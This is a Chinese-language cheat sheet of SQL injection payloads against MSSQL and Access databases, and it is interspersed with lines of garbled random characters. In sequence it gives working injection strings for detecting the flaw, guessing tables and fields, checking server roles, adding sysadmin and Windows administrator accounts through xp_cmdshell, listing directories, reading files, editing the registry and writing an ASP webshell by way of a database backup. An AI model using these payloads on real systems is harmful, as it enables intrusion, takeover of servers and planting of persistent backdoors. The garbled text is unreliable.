1.判断是否有注入;and 1=1 ;and 1=2 s;Q!X�� ?Q
2.初步判断是否是mssql ;and user>0 }�o`76r�DN
?6W�Y:Zec@
3.注入参数是字符'and [查询条件] and ''=' 1�=�V-�V<�
3a'<�*v<xw
4.搜索时没过滤参数的'and [查询条件] and '%25'=' MQ6KN(?\ZL
�SwMc
�pNo
5.判断数据库系统 XwaXd��vmK
q(84+{>��B
;and (select count(*) from sysobjects)>0 mssql f�NFY$:4X�
�&%J�0�8l6
;and (select count(*) from msysobjects)>0 access �X�'i�W�J8
S"�H2� 7
�.?$gpM?i
4�.t-i5���
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �%���EB�/b
�Ys�v"
6b}
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
ew4U)�2J+
��Gk6i�I�K
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >z@0.p�N]7
��j�se&D�Q
9.(1)猜字段的ascii值(access) S)�@j6(HC4
sXFZWj�}�\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |yPu!�pf�l
I; �rGD��^
(2)猜字段的ascii值(mssql) �Cp�0�=k�
W�H^%��:4�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 n�U7[c| =�
EA�Dq���C>
10.测试权限结构(mssql) w`�`U=sfmV
{��)sd�i�E
_�H@DLhH|=
.���7X^YKR
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- j0q�&&9/Jj
�X^j��fu�A
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- cw�
�<l�{A
f3y=Wxk[��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- AA>P`�C$&M
1?l1:�}^�L
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��[Y��`�W
�)vlhN2�iv
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- G�� 01ON0
,eS)e+yzc2
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��=7UsVn#o
Tw<q,�O���
;and 1=(select IS_MEMBER('db_owner'));-- �x�skz)�kk
I7�]8Y=xf�
o)/�� 0�a�
Tp2.V�IoQ=
11.添加mssql和系统的帐户 #Kv�lYZ�+1
#A�Y&B�WS$
;exec master.dbo.sp_addlogin username;-- }x��,S%�M-
;exec master.dbo.sp_password null,username,password;-- Dw�"\/p:-3
�c �&�c@M$
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *0r�o0Z|Iq
yB!dp;gM{�
;exec master.dbo.xp_cmdshell 'net user username password [nh�>vqu�m
��(cO:`W6.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 3OB"#Ap8�<
r�vM�{�M/4
;exec master.dbo.xp_cmdshell 'net user username password /add';-- y�f�,z$�CR
�-��nwyp�u
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 8�zb��/xP>
�N$tGQ��@
;9#Ke��A _
�1\.pMH�v/
12.(1)遍历目录 �vih9��KBT
D�t1j����W
;create table dirs(paths varchar(100), id int) 7}���mFL*�
/mZE/>&~�,
;insert dirs exec master.dbo.xp_dirtree 'c:\' �w!�XD/j�N
St^5Byd<��
;and (select top 1 paths from dirs)>0 |'�:{lH6+1
Y�4YJ�JYvD
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n�&�!�-9:0
}QmqoCAE~m
��(�h
`�V+
�!n%j)`0�M
(2)遍历目录 nr3==21Om4
z@j8�lv2j1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- H,NF;QPPC�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �rT>�wg1:�
Alq(���QDs
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��qxj(p� o
jb)ZLA;L_c
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �*NQ/UX�E�
�V�.2��_i*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e}W)LP�R!�
phz&zl���D
FGkVqZ Y2?
|l!�a�B(NW
13.mssql中的存储过程 7�[wPn`v2�
��yDh6KUK�
xp_regenumvalues 注册表根键, 子键 �D/'� dTrR
+H2Qk�4XFB
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 4P�o_-�4�
C9;kpqNG#u
xp_regread 根键,子键,键值名 c*M}�N�?|6
,"�q�l�5Q4
;exec xp_regread "Rl}��VeDY
�Q59W#e�)�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 D&zle~"� J
F�:ELPs4"�
xp_regwrite 根键,子键, 值名, 值类型, 值 &c #N)�U�
��T]$U"�"�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 #A��.@i+Zv
�:gC#�hmm^
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 B�J0?kX@��
'B}qZCy W
xp_regdeletevalue 根键,子键,值名 048kP��Xm`
X�X~,>Q}H=
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 M^I(OuRMeI
h�v+zG�ID7
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;wD)hNLAvR
%�XTI-B/�K
2T�`!��v�
y��LcE��X�
14.mssql的backup创建webshell rM�"l@3h�P
O��rG).^l�
use model [S<";l8���
i6�N',&jFU
create table cmd(str image); S
t�y�f�B
.|=\z9_7S8
insert into cmd(str) values (''); E} .^kc[(4
jh$='�G��n
backup database model to disk='c:\l.asp'; e�t+0F�F
,
���w#J2 wS
A)KZa�"EX
|K~Nw&�rZ]
15.mssql内置函数 ]%��(2hY~i
y> (�w\K9W
;and (select @@version)>0 获得Windows的版本号 xLn%hxm?,�
H[|��~/0?K
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d!�{r ���v
�q'�11^V!0
;and (select user_name())>0 爆当前系统的连接用户 B�1Oq���!k
�|'2d_��vR
;and (select db_name())>0 得到当前连接的数据库 =�Runf
�+}
��L�HmZxi?
<6=c,�y��
�� C.QO#b�
16.简洁的webshell ~�;]��d"'�
�mc��ok/,/
use model "I�TIhnE��
l�RdChoL$2
create table cmd(str image); 6zn5�U�W#q
D#z�:()VT(
insert into cmd(str) values (''); ze;KhUPRm�
-{�_PuJ �"
backup database model to disk='g:\wwwtest\l.asp';
